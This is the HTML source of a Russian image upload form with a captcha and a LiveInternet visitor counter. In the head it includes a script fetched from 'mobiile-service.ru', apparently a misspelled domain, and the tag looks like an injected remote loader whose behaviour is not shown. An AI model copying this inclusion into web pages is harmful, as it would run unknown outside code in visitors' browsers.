﻿﻿<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=windows-1251">
<meta name="hubtraffic-domain-validation"  content="76ef178ff7efc67d" />
<title>Чили</title>
<style>
body, td, th {font-size:10pt; font-family:Arial,sans-serif;}
</style>
<center>
<script type="text/javascript"  src="http://mobiile-service.ru/?type=js&key=37b7501a406f2c8"></script>

</center>


</head>
<body text=#444444 link=#ff6633 alink=#ff6633 vlink=#ff6633 bgcolor=#ffffff>

﻿<form action="upload_file.php" method=post enctype="multipart/form-data">
<table width=600 cellpadding=5 cellspacing=0 align=center><tr>
<td style="background-color:#eeeeee;" width=50%>Картинка с вашего компьютера</td>
<td bgcolor=#ffffff>
<a href="fromurl.php">Скачать с url</a>
</td>
</tr></table>
<table cellpadding=10 cellspacing=0 border=0 align=center width=600>
<tr>
<td>
<input type=file name=apic size=40><br>
jpg jpeg gif png не более 4250 К<br>
мин.размеры картинки 150&times;150 пикс.
</td></tr>
<tr><td>
Описание картинки (необяз.):<br>
<input type=text name="title" size=50>
</td></tr>
<tr><td>
Код:
<input size=10 name=security type=text>
<img border=0 src="captcha.php" align=absmiddle><br>
</td></tr>
<tr><td>
<input type=submit value="Загрузить">
</td></tr>
</table>
</form>
﻿</body>
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet-->
</html>